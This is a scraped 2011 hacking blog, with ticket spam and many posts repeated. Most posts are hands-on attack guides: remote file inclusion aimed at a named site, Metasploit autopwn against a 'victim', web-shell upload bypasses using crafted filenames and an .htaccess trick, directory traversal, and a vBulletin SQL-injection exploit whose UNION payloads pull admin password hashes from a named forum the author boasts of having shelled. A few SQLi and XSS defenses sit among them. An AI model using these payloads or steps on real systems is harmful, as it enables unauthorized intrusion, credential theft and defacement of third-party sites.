indiana pacers tickets
milwaukee bucks tickets
atlanta hawks tickets
Ticketamerica.com has all of you're basketball NBA ticketing needs for teams like the indiana pacers and the milwaukee bucks as well as the atlanta hawks games, maps and seating charts.
I am writing about how to hack a website which is RFI vulnerable . RFI means you can upload or link any remote file to the website. If you are lucky enough then you will be able to execute your script as a result you can own that server or you can deface that website completely. If the server is unpatched then it can be exploited using this vulnerability. This method is as powerful as SQL injection and requires a little brain compared to later. So guys lets have a look on how to get a RFI vulnerable site and how to hack it :)
Before going below make sure that you are using strong proxy :P
To find a RFI vulnerable website you can use google dorks. If you need dorks then mail me i'll send you huge list of dorks .
for example :
http://targetsite.com/index.php?page=home
you can easily guess what above url is doing , it simply fetches some text data from server and displaying it in webpage. This is the stage where you need a little brain and your creativity :P
let's say i am changing above url as :
http://targetsite.com/index.php?page=http://www.google.com
If you are redirected to google's page then you got RFI vulnerability is site woooohhhhhhh.....
real example :http://www.cbspk.com/v2/index.php?page=http://www.google.com.
This site is RFI vulnerable but server is patched
Don't get too much excited because now real stuff starts. so keep ypur eyes open.
Now what you all need to do is upload your shell in your server and redirect target site to that shell. If your shell successfully executes then its time to party....now you can handle your target site. If your shell does not executes then dont worry try once more by adding nullbyte , even if u dont succeed try using changing shells extension like shell.php to shell.php;jpg.
NOTE:shell will only execute if server has php support and is unpatched.
Now here you may also need some basic knowledge about bash commands because now days most of the servers are on LINUX.
Wednesday, 14 December 2011
Advance search engine for hackers - SHODAN
Hello Guys are you tired of using google dorks to search your target? or you think that it takes time to search for vulnerability because it is hit and trial method :P
Today i am posting about SHODAN search engine . I found it very useful in searching servers , routers , webcam ,ports etc .It finds computer running certain softwares (HTTP,FTP etc) and most interesting it filters hosts based on geographical locations directly.
SHODAN stands for Sentient Hyper-Optimized Data Access Network . It gives more accurate as well as helpful information. If you are really looking for vulnerability then use shodan and google you will feel the difference i am saying this because google looks at the web content only where as, Shodan can show you in plain text the network part of the host.
Here is the websites link http://www.shodanhq.com
eg Let us suppose i want to search for hosts which are running IIS 5 server then my query will be :
http://www.shodanhq.com/?q=iis+5.0
It gives results as:
" HTTP/1.0 403 Forbidden
Content-Length: 1283
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 20:37:47 GMT "
Just like this you will get 1123104 results for iis 5.0.
Today i am posting about SHODAN search engine . I found it very useful in searching servers , routers , webcam ,ports etc .It finds computer running certain softwares (HTTP,FTP etc) and most interesting it filters hosts based on geographical locations directly.
SHODAN stands for Sentient Hyper-Optimized Data Access Network . It gives more accurate as well as helpful information. If you are really looking for vulnerability then use shodan and google you will feel the difference i am saying this because google looks at the web content only where as, Shodan can show you in plain text the network part of the host.
Here is the websites link http://www.shodanhq.com
eg Let us suppose i want to search for hosts which are running IIS 5 server then my query will be :
http://www.shodanhq.com/?q=iis+5.0
It gives results as:
" HTTP/1.0 403 Forbidden
Content-Length: 1283
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 20:37:47 GMT "
Just like this you will get 1123104 results for iis 5.0.
Here i am posting some dorks for SHODAN that will help you to search
http://shodan.surtri.com/?q=cisco-IOS
http://shodan.surtri.com/?q=IIS+4.0
http://shodan.surtri.com/?q=Xerver (REF: http://www.exploit-db.com/exploits/9718)
http://shodan.surtri.com/?q=Fuji+xerox
http://shodan.surtri.com/?q=JetDirect
http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands%22
http://shodan.surtri.com/?q=port%3A80+iisstart.html
http://shodan.surtri.com/?q=Server:%20SQ-WEBCAM
http://shodan.surtri.com/?q=Netgear
http://shodan.surtri.com/?q=%22Anonymous+access+allowed%22
http://shodan.surtri.com/?q=Golden+FTP+Server
http://shodan.surtri.com/?q=IIS+5.0
http://shodan.surtri.com/?q=IIS+6.0
http://shodan.surtri.com/?q=%22Server%3A+iWeb%22+HTTP
http://shodan.surtri.com/?q=Wordpress
http://shodan.surtri.com/?q=Joomla
http://shodan.surtri.com/?q=Drupal
http://shodan.surtri.com/?q=iPhone+Web+Server
http://shodan.surtri.com/?q=FreeBSD
http://shodan.surtri.com/?q=IPCop
There are more dorks if you need them just send me mail. Now rest things depends on your brain and commonsense . Use your intelligence to use it efficiently.
Preventing SQL Injection (SQLi)
I have hacked many sites using SQL Injection . So i thought about writing how to prevent our web page against this attack. There are many methods to prevent SQLI but i am writing few of them.
Lets say our code is
http://target.com/index.php?id=21
The above code is easily injectable and is enough for an attacker to enter your site without proper authentication.
But if we replace above code with the code written below then i guess we are 99.9% secure :P
Alternatively we can check $_GET['id'] for illegal and unwanted characters like this :
If we want we can use javascript to block and filter characters . This would be also useful to get rid of basic SQL string injection which is done at login forms.
Lets say our code is
<?php
$display = mysql_query(‘SELECT text FROM pages WHERE id=’ . $_GET['id']);
echo($display);
echo($display);
?>
This means that we are selecting the page content ‘text’ from ‘pages’ in the SQL database, and we are selecting the right page content with $_GET['id'] and $_GET['id'] is the thing in the url , for examplehttp://target.com/index.php?id=21
The above code is easily injectable and is enough for an attacker to enter your site without proper authentication.
But if we replace above code with the code written below then i guess we are 99.9% secure :P
<?php
$display = mysql_query(‘SELECT text FROM pages WHERE id=’ . mysql_real_escape_string($_GET['id']));
echo($display);
echo($display);
?>
In above code mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " . This function must always be used to make data safe before sending a query to MySQL.Alternatively we can check $_GET['id'] for illegal and unwanted characters like this :
<?php
$inject = strrpos(strtolower($_GET['id']), “union”);
if ($inject === false){}else
{
die;
}
if ($inject === false){}else
{
die;
}
$inject = strrpos(strtolower($_GET['id']), “select”);
if ($inject === false){}else
{
die;
}
if ($inject === false){}else
{
die;
}
$display = mysql_query(‘SELECT text FROM pages WHERE id=’ . $_GET['id']);
echo($display);
?>
Similarly we can block Information_ ,_schema, admin ,order , and other such keywords . :)If we want we can use javascript to block and filter characters . This would be also useful to get rid of basic SQL string injection which is done at login forms.
Playing with SecureShell (SSH)
Hiii guys here i am writing about one of the most basic and popular method for remote administratotion. Here i will try to provide as much information i can.
SSH : (Secure Shell) : It is used to access or log in to a remote machine on the network,using its host name or IP address. Its a secure network data exchange protocol which came up as an enhancement of insecure potocols like telnet ,rsh,etc. SSH encrypts the bi-directional data transfers using cryptographic algorithms and hence it is away from data theft and sniffing.
Here we go with basic functions of SSH Protocol :
> Compression
>Public Key Authentication
>Port Forwarding
>Tunneling
>X11 Forwarding
>File Transfer
It seems to be a complete package for remote administration.
To install SSH Package in Linux based systems , here I am writing command for some distros
1> Debian :
# apt-get install openssh-server
# apt-get install openssh-client
2> Ubuntu
# sudo apt-get install openssh-server
# sudo apt-get install openssh-client
3> RHEL
# rpm -ivh openssh-server
# rpm -ivh openssh-client
4> fedora
# yum install openssh-server
# yum install openssh-client
now i guess you can install both the packages on your machine by issuing respective installation command. In case of windows OS , It does not support SSH as default protocol so we need to use third party agent like puTTy , "Ssh tunnel easy" or any other software. Now lets proceed to see working of ssh protocol. :)
>>>Basic Operations:
1> Remote login
root@sanju]# ssh user@hostname /* we can provide IP address of server in place of hostname
OR
root@sanju]# ssh hostname (this command is equal to ]# ssh root@hostname because we are trying to login from root of our machine to root of remote machine)
It might be possible you may not get connection even after ssh daemon is running on remote machine because system admin has configured SSH daemon to listen to anon-standard port such as 459 instead of 22. In this case you can issue a command to connect via desired port i.e.
root@sanju~]# ssh -p 459 hostname
After all above commands you will be prompted for password and after having proper credential you can access remote machine.
>>> Executing remote commands
Now Lets have some fun :
root@sanju~]# ssh remote-ip 'command'
e.g.
root@sanju~]# ssh hostname 'uname -a' (It will show kernel version and information about OS)
You can also fire this command to host >>> root@sanju~]# ssh user@hostname 'reboot' :P
SSH : (Secure Shell) : It is used to access or log in to a remote machine on the network,using its host name or IP address. Its a secure network data exchange protocol which came up as an enhancement of insecure potocols like telnet ,rsh,etc. SSH encrypts the bi-directional data transfers using cryptographic algorithms and hence it is away from data theft and sniffing.
Here we go with basic functions of SSH Protocol :
> Compression
>Public Key Authentication
>Port Forwarding
>Tunneling
>X11 Forwarding
>File Transfer
It seems to be a complete package for remote administration.
To install SSH Package in Linux based systems , here I am writing command for some distros
1> Debian :
# apt-get install openssh-server
# apt-get install openssh-client
2> Ubuntu
# sudo apt-get install openssh-server
# sudo apt-get install openssh-client
3> RHEL
# rpm -ivh openssh-server
# rpm -ivh openssh-client
4> fedora
# yum install openssh-server
# yum install openssh-client
now i guess you can install both the packages on your machine by issuing respective installation command. In case of windows OS , It does not support SSH as default protocol so we need to use third party agent like puTTy , "Ssh tunnel easy" or any other software. Now lets proceed to see working of ssh protocol. :)
>>>Basic Operations:
1> Remote login
root@sanju]# ssh user@hostname /* we can provide IP address of server in place of hostname
OR
root@sanju]# ssh hostname (this command is equal to ]# ssh root@hostname because we are trying to login from root of our machine to root of remote machine)
It might be possible you may not get connection even after ssh daemon is running on remote machine because system admin has configured SSH daemon to listen to anon-standard port such as 459 instead of 22. In this case you can issue a command to connect via desired port i.e.
root@sanju~]# ssh -p 459 hostname
After all above commands you will be prompted for password and after having proper credential you can access remote machine.
>>> Executing remote commands
Now Lets have some fun :
root@sanju~]# ssh remote-ip 'command'
e.g.
root@sanju~]# ssh hostname 'uname -a' (It will show kernel version and information about OS)
You can also fire this command to host >>> root@sanju~]# ssh user@hostname 'reboot' :P
>>> Input/Output redirection
First let's have a look to these command
echo "hackersgallery" demofile
cat < demofile equivqlent to "cat demofile"
i guess you can easily get what above command is doing. In first command string "hackersgallery" is directed to a file named "demofile" . In second command file "demofile" is directed to "cat" command.
Now move further :
echo hello|command1|command2
here "|" is pipe operator. It uses output of one command as Input to the another command. We can use any number of pipe serially e.g.
root@sanju]# echo "hackersgallery" | tr -d 'l'
output will be > hackersgaery
you can try out some more clubbbing of operators to get interesting results :
root@sanju]# ssh user@remotehost 'cat /etc/passwd | grep root'
SSH protocol also supports data transfer with compression
root@sanju~]# ssh -C user@remotehost
>>> File Transfer
Two data transfer utilities that will help you are SCP and SFTP. SCP stands for secure copy, We can use it to copy data from local machine to remote machine , remote machine to local machine or remote machine to remote machine.
>> local machine to remote machine
scp local_file_path user@remotehost::destination_file_path
>> remote machine to local machine
scp user@remotehost : remote_file_path local_destination_file_path
>> remote machine to remote machine
scp user1@remotehost1 user@remotehost2
We can even use wildcards to select file if we dont know exact name of file we want to get
scp :/home/*.txt /home/sanju/
SFTP stands for secure file transfer protocol.It is secure implementation of of the traditional FTP protocol . we can issue a command as
sftp user@remotehost (after entering password we'll enter sftp prompt)
sftp>
some of the commands that are available under sftp are:
>cd - to change directory on remote machine
>ls - to list remote directory content
>lcd - to change directory on local machine
>lls - to list local directory content
>put - to send or upload files to remote machine from current working directory of local machine
>get - to recieve or download files from remote machine to current working directory of local machine
RUNNING X-WINDOWS REMOTELY
To enable X11 Forwarding , edit ssh_config file
root@sanju~]# vi /etc/ssh/ssh_config
ForwardX11 yes
save and exit
Now to launch GUI apps remotely execute ssh command with X-option. e.g.
root@sanju~]# ssh -X root@remotehost 'vlc'
PORT FORWARDING
One of the important use of SSH is port forwarding, SSH allows you to forward port from client to server and server to client. There are two types of port forwarding Local and Remote. In local port forwarding ports from the client are forwarded to server ports ,Thus the locally forwarded port will act as the proxy port for port on the remote machine.
Local port forwarding
root@sanju~]# ssh -L local_port:remote_host:remote_port e.g.
ssh -L 2020:remotehost:20
here it forwards local port 2020 to remotehost's SSH port 22 , Thus we can use
ssh localhost -p 2020 instead of "ssh remotehost"
In remote port forwarding, ports from server are forwareded to a client port , Thus ports on the remote host will act as the proxy for ports on the local machine.
What is the use of remote forwarding?
Suppose you have local machine that lies inside an internal network connected to the Internet through a routeror gateway- If we want to access the local machine from outside the network , it is impossible to access it directly ,But by forwarding the local ports to a remote host,we can access the local machine through ports of remote host.
so our command will be
ssh -R remoteport :remotehost:localport e.g.
ssh -R 2020:remotehost.com:22
To SSH to the local machine from outside the internal network, we can make use of "remotehost.com " as
ssh remotehost.com:2020
SOCKS4 Proxy
SSH has an interesting feature called dynamic port forwarding with which the SSH TCP connection will work as SOCKS4 proxy.By Connecting to the given port,it handles SOCKS data transfer requests.
What is the use of dynamic port forwarding?
Lets suppose you have a machine on a network that is connected to the internet and you have another machine on the same network that does nothave ant internet connection. By using SSH Dynamic port forwarding you can easily access the internet by setting up the machine with an internet connection to act as the SOCKS4 proxy using SSH tunnel.
For dynamic port forwarding use following command:
ssh -D 3000 remotehost
now in your browser specify proxy setting as:
SOCKS4
hosts : localhost
port : 3000
to enable DNS service in firefox,navigate to about :config page and set
network.proxy.socks_remote_dns = true
There are many more things about SSH that are still to be learned . At last let us write a single shell script to reboot all the switched-on machines in the network.
#!/bin/bash
base_ip="192.168.0.";
for machine in $base_ip{1..255};
do
ping -c2 $machine &> /dev/null ;
if [$? -eq 0];
then
ssh $machine reboot ;
fi
done
Hacking a computer with metasploit
today i am sharing how to use metasploit to exploit a remote computer.
Here we go :
NOTE : I am not responsible for what you do with this information.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.
Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.
Now launch msfconsole.
It'll take sometime as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load the Nmap up.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!
Now you have full access to that PC you can do anything with this PC.
Here we go :
NOTE : I am not responsible for what you do with this information.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.
Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.
Now launch msfconsole.
It'll take sometime as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load the Nmap up.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!
Now you have full access to that PC you can do anything with this PC.
Uploading a Shell
How to Upload a Shell
First of all, when uploading a shell, you MUST be able to problem solve. Some of the techniques I have compiled in this guide aren't exactly easy for most of you.
I am separating this guide into steps, and sometimes, this won't always work. In fact, most of the time (If the coder was that bright at all), these techniques will NOT work. So don't go posting away about it not working for you on one site..
First though, you need some form of upload script. I don't care if it's a public upload script, or one off an admin page.
Step 1
First off, try the shell with the regular php extension. I've seen this work for admin panels a lot of the time, because the coder doesn't think anyone but the site admin will be messing with it.. He doesn't stop to think about security.
Step 2
If step 1 doesn't work, you're going to have to try different extensions that also execute php on most servers. These would include .php2, .php3, .php4, .php5, .phtml, .htm (rare cases), .html (rare cases), and no extension at all (rare cases). Also, you can attempt using a null to make it work.
Examples:
Code:
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
Step 3
Now on to step 3, it seems that step 2 didn't work for you. Sometimes, (now this is occasional), the file extensions it will accept are in the source of the page itself.. this is most common for java uploaders and similar. So to check for this, obviously view the source of the page and check it over for anything that looks like file extensions. If you do find any, you are going to want to use a tool like Firebug (Addon for Firefox), to edit the source to include the extension "php".
Step 4
Next, maybe the script is just blocking the .php, .php2, .php3, ect. scripts from being uploaded. The best way to counter-act this is to upload a .htaccess file. Go into notepad or w/e and paste this in:
Code:
AddType application/x-httpd-php .shell .other .jpg .gif .png .mov .pdf
Then upload the shell with one of those extensions. It should execute as php even with the wierd extension.
Step 5
Last but not least, is the header modification trick. This one is a little complicated (Will add pics in a min..) To do this, you need something like the Tamper Data addon for Firefox. In this example, I'll use that addon. What you want to do is after you attempt to send the post data, tamper the data before it sends. Then you will want to scroll through the raw data until you find the header data.. let's say our header is Application/Data... you would want to change that to something appropriate to the scripts intended purpose, like Image/Jpeg for an image upload script.
That concludes a guide for how to upload a shell for now, will add more to it later, enjoy!
happy hacking :))
First of all, when uploading a shell, you MUST be able to problem solve. Some of the techniques I have compiled in this guide aren't exactly easy for most of you.
I am separating this guide into steps, and sometimes, this won't always work. In fact, most of the time (If the coder was that bright at all), these techniques will NOT work. So don't go posting away about it not working for you on one site..
First though, you need some form of upload script. I don't care if it's a public upload script, or one off an admin page.
Step 1
First off, try the shell with the regular php extension. I've seen this work for admin panels a lot of the time, because the coder doesn't think anyone but the site admin will be messing with it.. He doesn't stop to think about security.
Step 2
If step 1 doesn't work, you're going to have to try different extensions that also execute php on most servers. These would include .php2, .php3, .php4, .php5, .phtml, .htm (rare cases), .html (rare cases), and no extension at all (rare cases). Also, you can attempt using a null to make it work.
Examples:
Code:
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
Step 3
Now on to step 3, it seems that step 2 didn't work for you. Sometimes, (now this is occasional), the file extensions it will accept are in the source of the page itself.. this is most common for java uploaders and similar. So to check for this, obviously view the source of the page and check it over for anything that looks like file extensions. If you do find any, you are going to want to use a tool like Firebug (Addon for Firefox), to edit the source to include the extension "php".
Step 4
Next, maybe the script is just blocking the .php, .php2, .php3, ect. scripts from being uploaded. The best way to counter-act this is to upload a .htaccess file. Go into notepad or w/e and paste this in:
Code:
AddType application/x-httpd-php .shell .other .jpg .gif .png .mov .pdf
Then upload the shell with one of those extensions. It should execute as php even with the wierd extension.
Step 5
Last but not least, is the header modification trick. This one is a little complicated (Will add pics in a min..) To do this, you need something like the Tamper Data addon for Firefox. In this example, I'll use that addon. What you want to do is after you attempt to send the post data, tamper the data before it sends. Then you will want to scroll through the raw data until you find the header data.. let's say our header is Application/Data... you would want to change that to something appropriate to the scripts intended purpose, like Image/Jpeg for an image upload script.
That concludes a guide for how to upload a shell for now, will add more to it later, enjoy!
happy hacking :))
Cross Site Scripting (XSS)
Hello Friends, Today i am sharing about the most common vulnerability which is generally found in most of websites because of poor coding. First f all let me tell you what XSS is.
WHAT IS XSS: reference wikipedia -
"Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based security solution. The attack allows content (scripts) in unprivileged zones to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:
* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.
* a web browser configuration error; unsafe sites listed in privileged zones.
* a cross-site scripting vulnerability within a privileged zone
A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.
This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page."
Second step is to code a XSS vulnerable page so here we go:
open notepad and copy content from links given below
save this page as index.html => http://pastebin.com/Y6pN08pv
save this page as: XSS.php => http://pastebin.com/L0E4bJKc
open index.html in firefox
enter a value and search ,return on the page of search and enter
send the form
Above was just a simple "non persistent XSS" ,However a XSS attack can lead to serious problems such as cookie stealing,privacy disclosure,defacing etc. You can code a cookie grabber and then u can redirect your victim to that script. Persistent XSS allows attacker to change the content of site means data so the website will look normal as all the links are given by the pwner of the site hence the victims will easily trust and may follow evil's link :P
now next step is to secure XSS:
simply use
use htmlspecialchars() function in PHP or use other function: htmlentities() :-)
code ==> http://pastebin.com/Cc4quJVB
In next post i'll write about How to bypass filter to get XSS on site and will share many more tricks that can be played in XSS vulnerable site ;-)
Happy hacking at your own risk :)
--------------------------------------------------------------------------
wrote by sanjeev
WHAT IS XSS: reference wikipedia -
"Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based security solution. The attack allows content (scripts) in unprivileged zones to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:
* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.
* a web browser configuration error; unsafe sites listed in privileged zones.
* a cross-site scripting vulnerability within a privileged zone
A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.
This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page."
Second step is to code a XSS vulnerable page so here we go:
open notepad and copy content from links given below
save this page as index.html => http://pastebin.com/Y6pN08pv
save this page as: XSS.php => http://pastebin.com/L0E4bJKc
open index.html in firefox
enter a value and search ,return on the page of search and enter
send the form
Above was just a simple "non persistent XSS" ,However a XSS attack can lead to serious problems such as cookie stealing,privacy disclosure,defacing etc. You can code a cookie grabber and then u can redirect your victim to that script. Persistent XSS allows attacker to change the content of site means data so the website will look normal as all the links are given by the pwner of the site hence the victims will easily trust and may follow evil's link :P
now next step is to secure XSS:
simply use
use htmlspecialchars() function in PHP or use other function: htmlentities() :-)
code ==> http://pastebin.com/Cc4quJVB
In next post i'll write about How to bypass filter to get XSS on site and will share many more tricks that can be played in XSS vulnerable site ;-)
Happy hacking at your own risk :)
--------------------------------------------------------------------------
wrote by sanjeev
Directory Traversal Using robots.txt
Hi Friends first of all let me tell u What is Directory Transversal
Directory Transversal allows you to change what directory you are located in by typing in the URL bar. This allows you to access pages you normally can't on an insecure webpage.
Now what is robots.txt-
"Web site owners use the /robots.txt file to give instructions about their site to web robots; this is called The Robots Exclusion Protocol."
It works likes this: a robot wants to vists a Web site URL, say http://www.example.com/welcome.html. Before it does so, it firsts checks for http://www.example.com/robots.txt, and finds:
User-agent: *
Disallow: /
The "User-agent: *" means this section applies to all robots. The "Disallow: /" tells the robot that it should not visit any pages on the site.
==>Now next step is Finding disallowed pages
This is quite simple. Go to the main page and type in:
Http://www.[hostname].ext/robots.txt
In this textfile, you will see something that looks like this:
User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
>>User-Agent can be something else then* this means all. This can be a type of webbrowser. That would block the user agent.
Now our last step is to access pages since we can traverse those directories which are allowed but what about those which are disallowed for traversal. here we can try a trick that may help you to get into the restricted directory:
Type a directory that comes after CODE:
Disallow:
Chances are, you will get denied.
To get access you could see if you can mod your cookie, but that's not what I'm talking about.
Now type in the same directory as before, but add /Anyrandomletters&symbols
It should look like this:
[host]/disalloweddirectory/Anyrandomletters&symbols
This will give you an error saying not found. Good.
Now for the Directory Transversal part:
[host]/disalloweddirectory/anyrandomletters&symbols/../
You should have noticed the /../ That is the Directory Transversal part.
What this does is send you back one directory, and if the website is insecure, then you can get access to the Disallowed area.
This doesn't work with just about every popular site, but works with privately owned sites which are nor properly coded.
Thnx :-) Enjoy hacking :-)
--------------------------------------------------------------------
wrote by sanjeev.
Directory Transversal allows you to change what directory you are located in by typing in the URL bar. This allows you to access pages you normally can't on an insecure webpage.
Now what is robots.txt-
"Web site owners use the /robots.txt file to give instructions about their site to web robots; this is called The Robots Exclusion Protocol."
It works likes this: a robot wants to vists a Web site URL, say http://www.example.com/welcome.html. Before it does so, it firsts checks for http://www.example.com/robots.txt, and finds:
User-agent: *
Disallow: /
The "User-agent: *" means this section applies to all robots. The "Disallow: /" tells the robot that it should not visit any pages on the site.
==>Now next step is Finding disallowed pages
This is quite simple. Go to the main page and type in:
Http://www.[hostname].ext/robots.txt
In this textfile, you will see something that looks like this:
User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
>>User-Agent can be something else then* this means all. This can be a type of webbrowser. That would block the user agent.
Now our last step is to access pages since we can traverse those directories which are allowed but what about those which are disallowed for traversal. here we can try a trick that may help you to get into the restricted directory:
Type a directory that comes after CODE:
Disallow:
Chances are, you will get denied.
To get access you could see if you can mod your cookie, but that's not what I'm talking about.
Now type in the same directory as before, but add /Anyrandomletters&symbols
It should look like this:
[host]/disalloweddirectory/Anyrandomletters&symbols
This will give you an error saying not found. Good.
Now for the Directory Transversal part:
[host]/disalloweddirectory/anyrandomletters&symbols/../
You should have noticed the /../ That is the Directory Transversal part.
What this does is send you back one directory, and if the website is insecure, then you can get access to the Disallowed area.
This doesn't work with just about every popular site, but works with privately owned sites which are nor properly coded.
Thnx :-) Enjoy hacking :-)
--------------------------------------------------------------------
wrote by sanjeev.
6gb huge wordlists 0 duplicates
Wordlists compiled and sorted by me, all the wordlists I could find on the web amounting to 6 gigabytes.
Compressed into zip and split into 13 parts.
(each approx. 500mb when extracted)
Immortal wordlist 1
Immortal wordlist 2
Immortal wordlist 3
Immortal wordlist 4
Immortal wordlist 5
Immortal wordlist 6
Immortal wordlist 7
Immortal wordlist 8
Immortal wordlist 9
Immortal wordlist 10
Immortal wordlist 11
Immortal wordlist 12
Immortal wordlist 13
Enjoy and be sure to keep on my blog for more of the latest techniques, files and hacks.
Compressed into zip and split into 13 parts.
(each approx. 500mb when extracted)
Immortal wordlist 1
Immortal wordlist 2
Immortal wordlist 3
Immortal wordlist 4
Immortal wordlist 5
Immortal wordlist 6
Immortal wordlist 7
Immortal wordlist 8
Immortal wordlist 9
Immortal wordlist 10
Immortal wordlist 11
Immortal wordlist 12
Immortal wordlist 13
Enjoy and be sure to keep on my blog for more of the latest techniques, files and hacks.
Monday, 12 December 2011
Vbulletin 4.1.4 exploit tutorial
http://www.optikal-market.com/
yeh its my mates CC forum that was shit so he don't use, its 4.1.4.
so make an acc or whatever... ill be using my acc admin
once you make an acc go to group.php:
http://optikal-market.com/group.php
for this if their is already a group their you don't need to make one.
remember the group id when you hover over join group here it is 1
join the group and make a discussion called anything for me its awesome1337
so know what you must remember:
the groupid you joined = 1
the discussion you made in that group = awesome1337
So now go to search.php
http://www.optikal-market.com/search.php
and do this:
tick group messages
tick exact name
search awesome1337
like so:
http://www.img.lc/i/selection0.png
open http headers tick capture and then on the target search!
when the url is loaded go to your http headers and there should be something like this:
http://www.img.lc/i/selectjvj.png
click the one that is highlighted in my pic, and click the replay button.
then there should be something like this:
http://www.img.lc/i/selectxux.png
now this is the crucial injection data
ill break it down
vulnerable param:messagegroupid
nulling param:messagegroupid[0]
=1: groupid
union select blah blah: injection
so heres the full code for all a certain admin pass
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
for my site its from vb_user
because i made the tables like that.
most sites are just: user
some sites are different so use your brain to get the tables
hack the site if you want lol I already shelled it anyway
yeh its my mates CC forum that was shit so he don't use, its 4.1.4.
so make an acc or whatever... ill be using my acc admin
once you make an acc go to group.php:
http://optikal-market.com/group.php
for this if their is already a group their you don't need to make one.
remember the group id when you hover over join group here it is 1
join the group and make a discussion called anything for me its awesome1337
so know what you must remember:
the groupid you joined = 1
the discussion you made in that group = awesome1337
So now go to search.php
http://www.optikal-market.com/search.php
and do this:
tick group messages
tick exact name
search awesome1337
like so:
http://www.img.lc/i/selection0.png
open http headers tick capture and then on the target search!
when the url is loaded go to your http headers and there should be something like this:
http://www.img.lc/i/selectjvj.png
click the one that is highlighted in my pic, and click the replay button.
then there should be something like this:
http://www.img.lc/i/selectxux.png
now this is the crucial injection data
ill break it down
vulnerable param:messagegroupid
nulling param:messagegroupid[0]
=1: groupid
union select blah blah: injection
so heres the full code for all a certain admin pass
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
for my site its from vb_user
because i made the tables like that.
most sites are just: user
some sites are different so use your brain to get the tables
hack the site if you want lol I already shelled it anyway
Subscribe to:
Comments (Atom)